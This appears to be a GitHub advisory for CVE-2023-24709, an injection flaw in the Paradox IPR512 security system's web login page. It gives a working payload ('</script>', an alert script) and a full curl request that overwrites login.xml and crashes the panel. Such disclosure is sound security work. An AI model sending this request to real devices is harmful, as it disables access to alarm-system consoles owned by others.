CVE-2023-24709: GitHub - SlashXzerozero/Injection-vulnerability-in-Paradox-Security-Systems-IPR512: In Paradox Security System IPR512 Web console login form page, attacker can input JavaScript string, e.g. "<script>a

Injection vulnerability in Paradox Security Systems IPR512

In Paradox Security System IPR512 Web console login form page, attacker can input JavaScript string, e.g. </script> or <script>alert(‘xss’)</script> that will overwrite configurations in the file “login.xml” and cause the login form to crash and make it unavailable.

1. The Paradox Security Systems IPR512 webpanel is accessible and the login form is available.

2. Sending login request with injection JavaScript string.

3. The login.xml file is overwritten

4. The webpanel login form is crashed and isn’t accessible anymore.

cURL code for executing the vulnerability:

curl -i -s -k -X $’GET’ \ -H $’Host: <IP_ADDRESS/PORT>’ -H $’Accept-Encoding: gzip, deflate’ -H $’Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9’ -H $’Accept-Language: en-US;q=0.9,en;q=0.8’ -H $’User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36’ -H $’Connection: close’ -H $’Cache-Control: max-age=0’ -H $’Upgrade-Insecure-Requests: 1’ -H $’Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"’ -H $’Sec-CH-UA-Platform: Windows’ -H $’Sec-CH-UA-Mobile: ?0’ \ $’http://<IP_ADDRESS/PORT>/login.html?log_user=%3C%2Fscript%3E&log_passmd5=’

Code injection vulnerability in login.html in Web panel login page on IPR512 of the Paradox Security Systems product that allows a remote or local attacker to cause the web panel login page crash via injecting easy JavaScript code into login form page such as </script>.